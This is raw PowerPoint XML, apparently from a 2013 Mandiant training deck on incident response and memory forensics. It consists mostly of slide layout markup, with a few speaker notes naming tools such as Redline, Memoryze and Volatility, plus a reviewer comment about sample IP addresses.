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comments/comment1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments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4"/>
    <p:sldMasterId id="2147483679" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId33"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="320" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="322" r:id="rId11"/>
    <p:sldId id="323" r:id="rId12"/>
    <p:sldId id="324" r:id="rId13"/>
    <p:sldId id="325" r:id="rId14"/>
    <p:sldId id="329" r:id="rId15"/>
    <p:sldId id="330" r:id="rId16"/>
    <p:sldId id="335" r:id="rId17"/>
    <p:sldId id="332" r:id="rId18"/>
    <p:sldId id="333" r:id="rId19"/>
    <p:sldId id="336" r:id="rId20"/>
    <p:sldId id="337" r:id="rId21"/>
    <p:sldId id="339" r:id="rId22"/>
    <p:sldId id="340" r:id="rId23"/>
    <p:sldId id="341" r:id="rId24"/>
    <p:sldId id="342" r:id="rId25"/>
    <p:sldId id="343" r:id="rId26"/>
    <p:sldId id="344" r:id="rId27"/>
    <p:sldId id="345" r:id="rId28"/>
    <p:sldId id="319" r:id="rId29"/>
    <p:sldId id="347" r:id="rId30"/>
    <p:sldId id="334" r:id="rId31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Chris Bream" initials="CAB" lastIdx="2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735" autoAdjust="0"/>
    <p:restoredTop sz="79303" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-2802" y="-486"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="4255"/>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2886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napToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="-3210" y="-90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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthor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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId38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slide" Target="slides/slide24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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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viewProps" Target="viewProp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slide" Target="slides/slide2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presProps" Target="presProps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0" dt="2013-10-11T14:38:19.794" idx="1">
    <p:pos x="5277" y="3300"/>
    <p:text>Small and dumb but your csrss strings had a target system with a 10. IP. This is a 172. Might want to consider making them consistent.</p:text>
  </p:cm>
</p:cmLst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>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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43B6B31-13DB-C747-BEC9-ACDD7222858D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11/26/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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B44BB84-3172-8D44-8972-D3E98A9951F8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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884138662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/>
                <a:cs typeface="Arial"/>
              </a:defRPr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Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BE45AFC9-A905-5F44-A1EA-077C56CFE383}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/26/2013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/>
                <a:cs typeface="Arial"/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Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{13E1F6D1-47F8-F249-A1AE-E5301C4316EA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03471630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Arial"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial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Arial"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial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Arial"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial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Arial"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial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Arial"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial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Jason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fld id="{72B13342-21E0-3B48-8250-38910847ED1D}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>November 26, 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Copyright © 2010, Mandiant Corp.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Page </a:t>
            </a:r>
            <a:fld id="{839F6E7D-C4AE-4439-BA38-CEAFA31F591E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Registry Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Familiar Output of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Autoruns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HijackThis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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/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6913556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47F4A42-485D-634E-A458-F04AB87D027D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735310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0C299F41-4CAA-42F6-B566-757ECD8CB316}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>November 26, 2013</a:t>
            </a:fld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 dirty="0" smtClean="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{056A8FA3-6DAC-4B0B-BD7D-03C0488EC9C2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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405228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E1F6D1-47F8-F249-A1AE-E5301C4316EA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657224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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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5303673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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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7062996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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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9913611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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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6482186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Gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redline, MIR,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Memoryze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>HBGary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Responder (live system)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Viewing – Redline, Volatility, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>HBGary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Responder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E1F6D1-47F8-F249-A1AE-E5301C4316EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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490963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Difference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> between NT5 and NT6 strings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47F4A42-485D-634E-A458-F04AB87D027D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55418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48741" y="2305905"/>
            <a:ext cx="8046519" cy="1572230"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4500" b="0">
                <a:solidFill>
                  <a:srgbClr val="822433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48741" y="4103680"/>
            <a:ext cx="8046519" cy="648532"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2200" b="0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11" name="Right Triangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938258" y="2034540"/>
            <a:ext cx="182880" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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ight Triangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="2057400"/>
            <a:ext cx="228600" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="5432727"/>
            <a:ext cx="8686800" cy="45720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3" name="Right Triangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="5889927"/>
            <a:ext cx="228600" cy="118872"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod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6" name="Content Placeholder 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184085" y="5432727"/>
            <a:ext cx="3878047" cy="364720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0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 smtClean="0"/>
              <a:t>Click to Add Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459339" y="5500826"/>
            <a:ext cx="1724747" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PRESENTED BY:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943264" y="5432727"/>
            <a:ext cx="2562594" cy="360487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400" cap="all" spc="10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 smtClean="0"/>
              <a:t>DATE GOES HERE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459339" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Mandiant_title banner.jp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914400"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2607857"/>
            <a:ext cx="9144000" cy="1649717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Right Triangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="4257575"/>
            <a:ext cx="228600" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod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Right Triangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938260" y="4234715"/>
            <a:ext cx="182880" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod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1" y="2642885"/>
            <a:ext cx="7315199" cy="1572230"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFB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776593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1440"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Triangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938259" y="1208404"/>
            <a:ext cx="182880" cy="228602"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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ight Triangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1231265"/>
            <a:ext cx="228601" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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66448"/>
            <a:ext cx="8229600" cy="486451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12328"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Mandiant_logo_KO.png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457200" y="6521032"/>
            <a:ext cx="1566725" cy="237752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136235" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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1440"/>
            <a:ext cx="9144000" cy="1143000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63040"/>
            <a:ext cx="4038600" cy="4525963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63040"/>
            <a:ext cx="4038600" cy="4525963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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="212328"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="Mandiant_logo_KO.png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457200" y="6521032"/>
            <a:ext cx="1566725" cy="237752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Triangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938259" y="1208404"/>
            <a:ext cx="182880" cy="228602"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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Right Triangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1231265"/>
            <a:ext cx="228601" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136235" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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1440"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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463040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263384"/>
            <a:ext cx="4040188" cy="3941776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463040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263384"/>
            <a:ext cx="4041775" cy="3941775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3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="212328"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="Mandiant_logo_KO.png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457200" y="6521032"/>
            <a:ext cx="1566725" cy="237752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Triangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8938259" y="1208404"/>
            <a:ext cx="182880" cy="228602"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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Right Triangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1231265"/>
            <a:ext cx="228601" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136235" y="6410622"/>
            <a:ext cx="2895600" cy="365125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l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/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6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© Mandiant Corporation. All rights reserved.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent6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1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601592" y="6410622"/>
            <a:ext cx="2061544" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5E8E4241-3A02-CC46-B36E-7394D8EDCFBE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1440"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="212328"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="Mandiant_logo_KO.png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457200" y="6521032"/>
            <a:ext cx="1566725" cy="237752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
